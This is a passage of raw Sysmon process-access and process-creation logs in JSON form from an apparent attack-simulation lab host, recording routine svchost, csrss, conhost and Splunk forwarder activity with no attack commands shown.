C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.812\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010FC6B0300}\r\nProcessId: 3980\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nParentProcessId: 3960\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.812","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010FC6B0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-0010066A0300}","ParentProcessId":"3960","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nSourceProcessId: 3960\r\nSourceThreadId: 3964\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC6B0300}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","SourceProcessId":"3960","SourceThreadId":"3964","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC6B0300}","TargetProcessId":"3980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC6B0300}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC6B0300}","TargetProcessId":"3980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 